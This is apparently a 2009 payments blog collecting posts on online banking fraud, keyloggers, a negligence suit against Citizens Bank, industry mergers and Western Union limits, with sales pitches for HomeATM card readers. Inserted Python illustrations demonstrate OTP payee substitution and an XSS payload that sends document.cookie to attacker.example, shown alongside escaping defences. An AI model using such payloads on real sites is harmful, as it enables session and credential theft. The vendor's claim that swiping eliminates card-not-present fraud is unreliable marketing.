Tuesday, September 8, 2009

Smart Card Alliance Executive Director Unhappy with Online Banking Security

In today's Smart Card Newsletter, issued by the Smart Card Alliance, its Executive Director, Randy Vanderhoof, had the following to say about online banking fraud:

Payment fraud resulting from massive data breaches was in the news again this month and one specific type of payment fraud–online banking fraud–got a little too close to home for me personally...

The Smart Card Alliance fell victim to such fraud this month. Our online banking account was breached by someone who created a valid account relationship with the Alliance’s business checking account and began making large, unauthorized ACH withdrawals from our account.

What was most shocking was how inept the bank’s (I won’t mention any names, but it is one of the BIG ones) internal business processes were in responding to the fraud, locking down the account, and putting on additional controls after the fraud was reported. What I was told was that I could set up manual controls to limit ACH deposits and withdrawals to only authorized accounts, but that I needed to upgrade our account to a “stronger” type of account.  It took 10 business days just to have an ACH blocking feature turned on!

I was also told that the bank can provide me with a smart card–not to securely log in and authenticate myself to my account in place of my current user name and password, but rather to have the chip generate a dynamic one-time password (OTP) each time I authorize a transaction.

For authentication, I would still have to type the password into my desktop computer, which just might be infected with a key logger connected to Twitter-like instant messaging that can capture my account information "and the OTP" as I type and log in as me without me even knowing it. (Such a “man-in-the-middle” attack was recently revealed in this NY Times article).

I am on a mission now: to find out how our bank account got hacked, why all online personal and business checking accounts are vulnerable–at least in this bank–and why no one is doing anything about it.
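Vanderhoof's point above is that a one-time code typed into an infected PC can be captured and used by the attacker before the bank ever sees the cardholder's own request. The following Python sketch is an added illustration, not code from the original post or from any bank or token vendor. It compares two ways a bank could verify a token-generated code: an "unbound" code that only proves the token was present, and a "bound" code, in the style of EMV CAP "sign" mode, that also covers the payee and amount the cardholder keyed into the token. The names (Transaction, BankServer, bound_response), the token secret and the two transactions are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
import struct
from dataclasses import dataclass

# Constructed illustration, not code from the original post or from any bank or token vendor.
# Class and function names, the token secret and the transactions are hypothetical.


@dataclass(frozen=True)
class Transaction:
    payee: str
    amount_cents: int


def mac_to_otp(secret: bytes, message: bytes) -> str:
    """Truncate HMAC-SHA256 to a six-digit code (dynamic truncation in the style of RFC 4226)."""
    digest = hmac.new(secret, message, hashlib.sha256).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 1_000_000:06d}"


def unbound_response(secret: bytes, challenge: bytes) -> str:
    """'Identify' mode: the code proves possession of the token and nothing else."""
    return mac_to_otp(secret, challenge)


def bound_response(secret: bytes, challenge: bytes, tx: Transaction) -> str:
    """'Sign' mode: the cardholder keys payee and amount into the token, so the code covers them."""
    message = challenge + tx.payee.encode("utf-8") + tx.amount_cents.to_bytes(8, "big")
    return mac_to_otp(secret, message)


class BankServer:
    def __init__(self, secret: bytes) -> None:
        self.secret = secret
        self.outstanding = set()   # challenges issued but not yet consumed

    def new_challenge(self) -> bytes:
        challenge = secrets.token_bytes(8)
        self.outstanding.add(challenge)
        return challenge

    def authorize(self, challenge: bytes, tx: Transaction, otp: str, bound: bool) -> bool:
        if challenge not in self.outstanding:
            return False                        # unknown or already-used challenge
        self.outstanding.discard(challenge)     # single use, so a plain replay fails too
        if bound:
            # Recomputed over the transaction the bank actually received, not the one the
            # cardholder thought they were sending.
            expected = bound_response(self.secret, challenge, tx)
        else:
            expected = unbound_response(self.secret, challenge)
        return hmac.compare_digest(expected, otp)


SECRET = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")   # constructed token secret
INTENDED = Transaction("ACME Office Supplies", 150_00)        # what the cardholder meant to pay
DIVERTED = Transaction("Mule Account 9921", 9_500_00)         # constructed attacker payee


def attacker_substitutes_payee(bound: bool) -> bool:
    """Return True if the bank accepts the malware's substituted transaction."""
    bank = BankServer(SECRET)
    challenge = bank.new_challenge()
    # The cardholder types the code the token shows for INTENDED ...
    otp = bound_response(SECRET, challenge, INTENDED) if bound else unbound_response(SECRET, challenge)
    # ... a key logger / man-in-the-browser captures it and submits DIVERTED with the same code.
    return bank.authorize(challenge, DIVERTED, otp, bound)


def honest_transaction(bound: bool) -> bool:
    """Sanity check: the cardholder's own transaction is accepted in both modes."""
    bank = BankServer(SECRET)
    challenge = bank.new_challenge()
    otp = bound_response(SECRET, challenge, INTENDED) if bound else unbound_response(SECRET, challenge)
    return bank.authorize(challenge, INTENDED, otp, bound)


if __name__ == "__main__":
    print("unbound OTP, payee swapped -> accepted:", attacker_substitutes_payee(bound=False))  # True
    print("bound OTP,   payee swapped -> accepted:", attacker_substitutes_payee(bound=True))   # False
```

Two caveats a practitioner would add. First, single-use challenges stop a later replay but not the real-time substitution shown here; only binding the code to the payee and amount does that. Second, binding only helps if the cardholder keys the true payee and amount into the token from a trustworthy source: malware that rewrites what the browser displays can get the victim to sign the attacker's transaction, which is why the token's own display matters.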

An Open Letter to Mr. Vanderhoof:   Randy,  HomeATM agrees that typing your password into your desktop computer is a futile way to prevent hackers from obtaining your sensitive data, and HomeATM IS trying to do something about it.  We are in the midst of speaking with several national banks in order to demonstrate that consumers need to authenticate themselves the same way they do at an ATM.  I am aware that, as Executive Director of the Smart Card Alliance, you would probably be more interested in our EMV version (which we have, should you know anyone in Europe who might be interested), but until EMV is prevalent in the United States, we are offering banks the opportunity to offer their customers our PCI 2.x Certified PIN Entry Device, the only one of its kind: one which would provide users with the security and protection of a two-factor (what you have/card and what you know/PIN) 3DES DUKPT TRUE "End to End Encrypted" Log-In.   (Most are End-to-Almost-End Encrypted.)  HomeATM provides true Zone 1 through Zone 5 encryption for the PIN.  (The track 2 data is encrypted through Zones 1-4.)

Our device would also provide consumers with the means to conduct "card present" transactions in a "card not present" fraud infested world (wide web) and enable the bank to offer a real time (not ACH) P2P Money Transfer option as well as " real time" online bill payments.  

Maybe the Citizens Bank lawsuit, which I blogged about earlier today, will open their eyes to the risk they are not only exposing their customers to, but the risk they are exposing themselves to as well!   Feel free to drop me a line anytime if you'd like to discuss further!

John B. Frank


Online Fraud Shows No Signs of Letting Up

Card Not Present Fraud is the biggest culprit. 

HomeATM provides a low cost, 2FA 3DES E2EE PCI 2.x Certified Solution which allows Internet Retailers and Consumers to level the playing field by eliminating the "card not present" environment. 

If an online consumer were instructed to "swipe" their card, thereby capturing the data on the magnetic stripe, it would be, by definition, a "card present" transaction.

Therefore, our device would eliminate "card not present" fraud by "morphing" the "card not present" environment into a "card present" environment.  Yes? 

You might say that HomeATM changes the way card information is swiped. 

The way it is done now, the card details are "swiped by the fraudsters."   Does it not make more sense for the online shopper to "swipe" their own card details? Then again, we could ignore all the red flags and just keep on typing!

No let up by fraudsters as online card spend soars | Response Source

Fraud prevention specialists reveal Britain’s top UK card fraud hotspots

Many of Britain’s high street shops may have been affected by the economic downturn, but millions of consumers have been more than happy to spend their money online and through mail order with their favorite retailers. However, once again the dark side of card usage is revealed as fraud specialists, the 3rd Man, unveil the extent of criminal card activity and in particular the worst places in Britain for attempted card fraud.
An analysis of the 3rd Man’s comprehensive and detailed records shows that between August 2008 and August 2009, shoppers spent an estimated £46 billion using their cards in ‘card not present’ transactions, the term used to describe purchasing when, for example, a customer is buying online or by phone. Of this figure, fraudsters have tried their best to relieve retailers of more than half a billion pounds worth of goods.

“Although Britain has been in a serious recession, it appears that many consumers have been happy to spend their money over the Internet, which is good news,” says Andrew Goodwill, fraud specialist with the 3rd Man.

“However, fraudsters show no signs of giving up. They know that online shopping has become big business and they try every scam imaginable to dupe retailers. More and more honest people are using their cards to buy over the Internet, but unfortunately more and more fraudsters are also upping their game.” 

Editor's Note:  Time to "up OUR game" or these "jokers" will continue to steal our identities, cash, and peace of mind.  Eliminate Typing, Start Swiping and "Card Not Present" fraud will be eliminated. It's really not that difficult to grasp the concept...is it?  


Metavante Shareholders Approve FIS Merger

On Friday, I posted a press release announcing that the Department of Justice cleared the way for an FIS/Metavante merger: See: FIS and Metavante Receive DoJ Clearance to Proceed with Merger

Last July, I posted that Fidelity National Information Services was holding a special shareholder meeting (See: Fidelity and Metavante to Hold Special Shareholder Meetings) to vote on the merger.  Apparently, Metavante was waiting on the DoJ clearance to hold and announce the results of their shareholders' votes:  RTTNews reports the vote was overwhelmingly "for"...

(RTTNews) - Banking and payment solutions provider Metavante Technologies, Inc., said Friday that its shareholders overwhelmingly approved the proposed merger with Fidelity National Information Services, Inc., FIS at a special shareholder meeting.

Earlier, on April 1, Fidelity, also a banking and payment technologies provider, had agreed to acquire rival Metavante in an all-stock deal valued at about $2.95 billion. The deal had the approval of the boards of both companies. The Milwaukee, Wisconsin-based company and FIS are targeting an October 1, 2009, completion date for the merger, subject to customary closing conditions. The transaction is expected to be accretive to adjusted earnings per share in fiscal 2010.

The combination is expected to create a company with a pro forma enterprise value of $10 billion and the world's largest provider of comprehensive integrated payment and financial core processing services. The deal is expected to achieve cost synergies of about $260 million and increased long-term organic revenue growth for Fidelity.

Metavante Technologies, spun-off from Marshall & Ilsley Corp. (MI) in November 2007, has been offering processing services to about 8,000 financial institutions of all sizes for more than 40 years. Services include outsourced deposit, loan, and trust account processing, check processing, electronic funds transfer, commercial treasury services, and health care payment services.


Biometrics Firm Partners with InterSwitch in Nigeria

LUND, Sweden - (September 8, 2009 PIN Payments Blog) Precise Biometrics has entered into a strategic partnership with Interswitch -- one of the leading African financial solution providers based in Nigeria. The aim is to supply fingerprint recognition with Precise Match-on-Card(TM) to bank applications. The partnership is already engaged in a first project, which will provide license sales at a minimum of EUR200,000 in 2009.

The partnership between Precise Biometrics and Interswitch aims at building and promoting biometric Match-on-Card solutions for the bank segment in Africa. The solutions will initially target Nigeria, which is the most populous country on the continent with more than 150 million inhabitants.

Nigeria recently decided to replace magstripe bank cards with more secure chip cards, so called smart cards, in order to gradually eliminate fraud related to less secure magstripe cards. The new cards comply with the EMV (Europay, Mastercard, VISA) standard used in the bank industry and the government deadline to replace all magstripe cards with chip-based smart cards is December 31, 2009.

To enable banks to migrate faster, Interswitch has introduced the Verve card into the market. The Verve card has both international and local security features, and through Interswitch's partnership with Precise Biometrics, it also includes fingerprint recognition and Match-on-Card features. These features are used to control a cardholder's physical presence at the moment of a transaction. With fingerprint recognition and Match-on-Card, banks, governments and organizations increase security internally as well as for customers through personal verification and KYE (Know Your Employee).

Mitchell Elegbe, Managing Director and Chief Executive Officer of Interswitch states: "We are pleased to enter into this partnership, as Precise Biometrics is the leading provider of biometric Match-on-Card solutions. We believe that our joint efforts and technological know-how will have great commercial potential in the West African region. The capabilities, security and reliability of the Match-on-Card solution gives us a positive differentiation from biometric solutions that are relying on databases or external servers."

Thomas Marschall, CEO at Precise Biometrics comments: "We are very pleased to have come to an agreement with Interswitch, which will place Precise Biometrics in a prime position to capture the rising biometric opportunities within the financial sector of West Africa. While the strength of the partnership is documented by already being engaged in a project which will provide income for 2009, we have substantial commercial expectations for the partnership in 2010 and onwards."

Precise Biometrics is a market-leading provider of solutions for fingerprint recognition to prove people's identities. With top-of-the-line expertise in fingerprint verification, Precise Biometrics offers fast, accurate and secure authentication of a person.

Its core product, Precise Match-on-Card(TM), adds value to ID, SIM, enterprise and bank cards as well as systems for access control to buildings, computers and networks. Precise Biometrics serves business and government organizations throughout the world and its technology is licensed to close to 100 million users.

For more information, please visit www.precisebiometrics.com


For the full version of the press release please click on the link below http://hugin.info/131387/R/1337790/318917.pdf

For more information, contact:

Precise Biometrics AB

Thomas Marschall, CEO

+46 46 31 11 10

+46 734 35 11 10

Email: thomas.marschall@precisebiometrics.com

Don't Say I Didn't Warn You on Dangers of Online Banking!

I've been blogging about the dangers of online banking for quite a while now.  So as more and more people fall victim to phishing attacks, keylogging, DNS hijacking, SQL injection, cloned bank websites, etc., you can't say I didn't warn you...

Today I found a "mainstream" article (The Telegraph UK) that sums up my beliefs...specifically..."Don't Type...Swipe!"

Here are some excerpts:

Viruses, spyware, key loggers – the James Bond style vocabulary of the computer hacker is enough to make us paranoid about losing all the money in our bank accounts when we log on to online banking to pay the gas bill.

And it's not just an irrational fear. Take one acquaintance of mine. She's hardly computer illiterate – a web designer with programming skills, she keeps her antivirus and other security software up to date religiously. Yet this didn't stop someone hacking into her account and sending himself most of the money she had at the time. A quick look at the online forums confirms that she's by no means the only one to fall for this particular scam.

So is online banking secure? I've spoken to a couple of experts in computer security. Both were happy to bank online themselves, they told me, although they take rigorous precautions to keep the hackers out. But they're experts: what about the rest of us? We don't want to spend our lives keeping up with the latest online threats.

After all, the criminals have economies of scale on their side – they can put a lot of effort into perfecting their malicious software because, once it's ready, they can use the internet to get it onto the PCs of hundreds of thousands of people. So there's a huge underworld industry out there, all busily working out new ways to bypass our firewalls and get at our passwords.

My experts told me that the man in the street can bank safely online, but only if certain conditions are met.
Firstly, if your bank has given you a card reader – a gadget you connect to your computer and insert your bank card into – you are safe.

If you don't have a card reader, look at how you enter your password.

Do you just type it in?
That's a gift to the scammers – a simple piece of spyware software called a key logger can record the password and send it off to the fraudsters over the internet.

Fortunately, the banks are getting wise to this. Many have developed websites that make you enter your details using mouse clicks. Although in principle it's possible to write malicious software that tracks this too, it's a lot more work than a simple key logger. Editor's Note:  A little more work won't stop them, besides, as more banks go to this method, more hackers will dedicate their time to developing a mouse click logging program...especially when people start mouse clicking their PINs, as PINs are the "holy grail" for hackers.

If you don't have a card reader and you use the keyboard to enter your whole password, you are depending entirely on your security software – and the hackers only have to be lucky once.

Personally, after seeing what happened to my friend the web designer, I wouldn't take this risk. She got her money back in the end, but only after days of worry and frantic phone calls. And the banks are becoming more and more reluctant to bail out those who have failed to take online security seriously.

When it comes to internet banking, a little paranoia is no bad thing.


Online Banking Fraud Doubled in 2008

How safe is your internet banking? | Dan Hyde, This is Money

Banks love to promote their internet banking's security, but just how safe is it? Find out why Halifax and Abbey customers are most at risk

How safe is your internet banking? Online banking fraud nearly doubled in 2008.

A worrying £52.5m was stolen by sinister hackers tracking the movements of their prey, affecting one in four of all those banking online.  Some customers are still falling foul of 'phishing' schemes – emails that pretend to be from a bank and then direct customers to bogus websites where their passwords are stolen.  But more careful online bank customers are also suffering at the hands of underground hacking technology.

'Keylogging' – whereby a virus tracks every stroke of a password as it is entered – can breach the best of defences on personal computers, and is largely held responsible for the rise in online fraud.
For the ordinary web user, extra-thick internet firewalls and up-to-date anti-virus software is about as much as can be done to fend off this aggressive software.  But improving technology has helped the hackers past these barriers and, to make matters worse, many users still forget or disregard important steps like regular computer checks.

That means the onus falls on the banks to protect their vulnerable customers from internet keylogging rogues – and some are better at it than others.  Expert-led research at Which? Computing magazine showed that Halifax and Abbey internet customers are exposed to the greatest risk of having money stolen from their accounts, while Barclays led the way with its anti-fraud password controls.

Security loopholes - including password entry methods that are dangerously exposed to keyloggers, and unprotected money transfers once a user is logged in - had Abbey and Halifax firmly at bottom of the online security pile.

Barclays, meanwhile, excelled by using both its PINsentry device to generate a random password every time a user logs on, and by asking for more login information than other banks.

Some banks have also begun to use apparatus such as drop-down menus, making keylogging impossible, but this has not yet found its way onto either Abbey or Halifax's sites.

Of course, the flipside is that the once ultra-convenient days of internet banking with just a password are gone for many, replaced by carrying a card machine with keypad round and having to fill in a run of details for each transaction.


Court Allows Suit Against Bank Based on Poor Online Banking Log-In

I was working on a post I decided to entitle "Don't Say I Didn't Warn You" (upcoming) when this came across the wires.  The PIN Payments Blog will follow this case closely as the ruling will set a precedent, as all rulings do.  This could be a game-changing ruling when it comes to how banks provide authentication.  As I've stated for the past 18 months, Don't Type...Swipe!  This case could result in banks being subjected to the risk, as opposed to their customers, which might provide more motivation for them to take the extra steps necessary to securely authenticate their online banking customers with a 2FA 3DES DUKPT E2EE PCI 2.x Certified approach.

This was first reported by David Johnson's Digital Media Lawyer Blog, which spoke a little about the largest precedential impact.

"The aspect of the case that may have the largest precedential impact was its decision on the plaintiffs' negligence cause of action. (Fn1) A major basis for their negligence claim was the theory that financial institutions have a common law duty to protect their members' or customers' confidential information against identity theft. While the Court could not find controlling State precedent on point (Indiana law applied), it noted that Indiana courts have held that a bank has a duty not to disclose information concerning one of its customers unless it is to someone who has a legitimate public interest. The Court then stated, "If this duty not to disclose customer information is to have any weight in the age of online banking, then banks must certainly employ sufficient security measures to protect their customers' online accounts."
Editor's Note:  If Citizens loses this case..."citizens everywhere win".... as banks will be forced to increase the security of online banking.  There is no safer way to authenticate the user than to utilize the same trusted security banks use to dispense cash at ATMs.  HomeATM provides the only 2FA 3DES DUKPT E2EE PCI 2.x Certified Solution in two hemispheres.  The average phishing attack is $352 and that hasn't yet got the banks moving.  Maybe the threat of losing $100k+ every time one of their online customers falls victim to fraud caused by weak authentication will motivate them to invest $12.00 or so, and protect themselves AND their customers.   We'll keep ya posted!

Finextra: Court allows suit against bank for poor online security

The plaintiffs claim that by only requiring user names and passwords to authenticate customers at log in, Citizens failed to maintain state-of-the-art security standards.  

A US couple who had thousands of dollars stolen from their online account have been given the go-ahead by a court to sue their bank for failing to provide adequate security.

In 2007 Marsha and Michael Shames-Yeakel fell victim to an ID thief who gained access to their Citizens Financial Bank online account and stole $26,500 from a home equity credit line.  The money was transferred, via a bank in Hawaii, to a financial institution in Austria. The Austrian bank refused to return the funds, prompting Citizens to inform the couple that they would be liable for the loss.

The Shames-Yeakels refused to pay, leading the bank to report their account as delinquent to the national credit bureaus and threaten to foreclose on their residence. In response, the couple sued the bank on several grounds, claiming violations of the Electronic Funds Transfer Act and the Fair Credit Reporting Act, in the Northern District of Illinois.   They also accused the bank of negligence under state law for failing to adequately protect their online accounts.

"In light of Citizens' apparent delay in complying with FFIEC security standards, a reasonable finder of fact could conclude that the bank breached its duty to protect Plaintiffs' account against fraudulent access." - US District Judge Rebecca Pallmeyer

The Judge also states: "If this duty not to disclose customer information is to have any weight in the age of online banking, then banks must certainly employ sufficient security measures to protect their customers' online accounts."


Does Western Union Limitation Apply to B2B Payments?

Commercial Payments International is reporting that Western Union is getting ready to compete in the B2B payments space.  I'm wondering out loud whether the same P2P limitation outlined in the previous post applies to B2B transfers.

Western Union to compete in the international B2B payments space

With its acquisition of international B2B (business-to-business) payments provider Custom House, Western Union has placed itself firmly as a competitor in the international B2B payments space. Custom House processes payments originating in seven countries for payout in 120 countries.

This acquisition introduces Western Union to a new market – cross-border payments for small- to medium-sized enterprises (SMEs). The SME segment has become an increasingly important focus for payments providers in recent times as they develop products designed to serve the needs of this previously underserved market.

Western Union estimates that the SME cross-border payments market generates global revenue at least as great as the consumer-to-consumer money transfer market.

Currently, Custom House enables more than 40,000 clients to make payments in over 150 currencies. Its clients range from businesses with a need to pay international staff to firms that want to pay vendors and merchants.


Western Union Limitation Causing Big Problems

US Meltdown Crippling Western Union Money Transfers

7News in Belize is reporting on a little-known Western Union limitation.  Namely, what goes out has to have come in the day before.  This is causing a big problem for people wanting to send money transfers.  In fact, reports say if you don't get there and put in your send request by 8:15 AM, you are out of luck for that particular day....

Have you tried to send money via Western Union recently? If you have, then you’ll know that unless you start lining up, like an hour before the office opens, it’s almost impossible to send money. But why is this? Is it an oppressive monetary policy, low reserves or could it be what the growth economists like to call “exogenous shocks?” Well, according to the Governor of the Central Bank Glenford Ysaguirre it’s the third: outside factors.

You see, in any one day, Western Union can only send out as much money as it got the day before – and since the US financial meltdown, remittances, meaning money sent from the states, has declined sharply. So, in any one day, all the Western Union agencies across the country only receive something in the range of one hundred thousand US dollars. So that becomes the quota for the following day, meaning the limit of what they can wire out. Spread that $100,000 across 37 agencies countrywide, and it’s not much, meaning that if you get to a Western Union office by 8:15, you’re probably already too late!

It’s a big change; in the past no one had ever heard of a cap on the amount of money that can be sent out; you could visit the office anytime during regular working hours and breezily send the money. But things have changed and it’s been the roughest on those who depend on the service for its convenience and speed. But the Governor of the Central Bank told Jacqueline Godwin today that there’s nothing the bank can do.

Glenford Ysaguirre, Governor - Central Bank of Belize

“There is some misinformation out there that the Central Bank has something to do with it because we are restricting Western Union. But no, those are conditions on their licenses from the time the licenses were issued. So it is not some new condition that has gone into place; it has always been there. It is just that in the past the remittances were sufficient to cover the outgoing demand.  A condition of their license is that they can only sell foreign exchange to the extent that they receive. So their outgoing remittances cannot be more than their incoming. That is to protect and preserve the reserve position of the country.

Jacqueline Godwin, “So for example if they receive twenty thousand dollars for that day, they cannot give out more than twenty thousand dollars?

Glenford Ysaguirre, “Yes that is the condition. So I guess with the economic downturn remittances coming from the States actually are on a decline and so they are restricted or limited by that and have to adjust the outgoing remittances to the same magnitude.

The Central Bank is not here to source US dollars for Western Union remittances. The commercial banks source their own US dollars and they source that through investments coming in from customers or from proceeds from export earnings that go into the commercial banks and that is also available to the public through the commercial banks. So if Western Union does not have, people have the option of going to a commercial bank and purchasing US dollars based on availability.”  Anecdotal reports are that things have gotten so bad in the States that in some cases Belizeans are subsidizing their Belizean-American relatives. Ysaguirre says that retired Belizeans living in the States are also drawing down on their savings in Belize. In the meantime, he’d urge those frustrated with the Western Union cash flow constriction to try using the banks since they have greater sources of foreign exchange.


Web Browsers Exploited by XSS Attacks

Tech Insight: XSS Exposed

Pervasive Web application vulnerability is often misunderstood -- with dangerous consequences
By John Sawyer DarkReading - A Special Analysis for Dark Reading

SQL injection has been getting most of the attention lately, but the average SQL injection attack isn't nearly as sophisticated and difficult to pull off as a well-crafted cross-site scripting (XSS) attack:

XSS affects all victims of a vulnerable Website, stealing their credentials, exploiting their Web browsers, and taking action on behalf of them without their knowledge.

XSS has been the reigning champion of Web application vulnerabilities in the sheer number of applications that house this vulnerability. Like SQL injection, XSS is a flaw caused by a lack of validation of user input. But instead of attacking the Web application or database server directly, the XSS attack hits the Web app's victims and executes malicious code in the victims' Web browsers.

Continue Dark Reading
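The excerpt above describes XSS as unvalidated user input that ends up executing in the victim's browser. The following Python sketch is an added illustration, not code from the Dark Reading article. It reflects a search term into two HTML contexts (element text and a quoted attribute), once unescaped and once through context-appropriate HTML escaping, and then parses the result the way a browser would to show which version actually grows a script tag or an event handler. The page fragments, the two payloads and the helper names are assumptions made for the example.

```python
import html
from html.parser import HTMLParser

# Constructed illustration, not code from the Dark Reading article. Page fragments,
# payloads and helper names are hypothetical.

# Two constructed attacker inputs, one per HTML context.
ATTACK_BODY = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
ATTACK_ATTR = '" autofocus onfocus="alert(document.domain)'


def render_heading(term: str, hardened: bool) -> str:
    """Reflect the search term into element text."""
    shown = html.escape(term, quote=True) if hardened else term
    return f"<h1>Results for {shown}</h1>"


def render_input(term: str, hardened: bool) -> str:
    """Reflect the search term into a double-quoted attribute value."""
    shown = html.escape(term, quote=True) if hardened else term
    return f'<input name="q" value="{shown}">'


class TagCollector(HTMLParser):
    """Record what a browser-like parser sees: start tags and attribute names, in order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)


def parse_page(page: str):
    """Return (start tags, attribute names) for an HTML fragment."""
    parser = TagCollector()
    parser.feed(page)
    parser.close()
    return parser.tags, parser.attrs


def script_injected(page: str) -> bool:
    """True if the rendered fragment contains a <script> element the template never wrote."""
    tags, _ = parse_page(page)
    return "script" in tags


def handler_injected(page: str) -> bool:
    """True if the rendered fragment gained an on* event-handler attribute."""
    _, attrs = parse_page(page)
    return any(name.startswith("on") for name in attrs)


if __name__ == "__main__":
    for hardened in (False, True):
        label = "hardened" if hardened else "vulnerable"
        print(label, "heading grows <script>:", script_injected(render_heading(ATTACK_BODY, hardened)))
        print(label, "input grows on* handler:", handler_injected(render_input(ATTACK_ATTR, hardened)))
```

html.escape with quote=True is the right encoder for element text and for quoted attribute values, and nowhere else: a value placed inside a JavaScript string, a URL, a CSS block or an unquoted attribute needs the encoder for that context. The payload above reads document.cookie, which is exactly what marking session cookies HttpOnly denies, so output encoding and cookie flags are complementary controls rather than alternatives.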

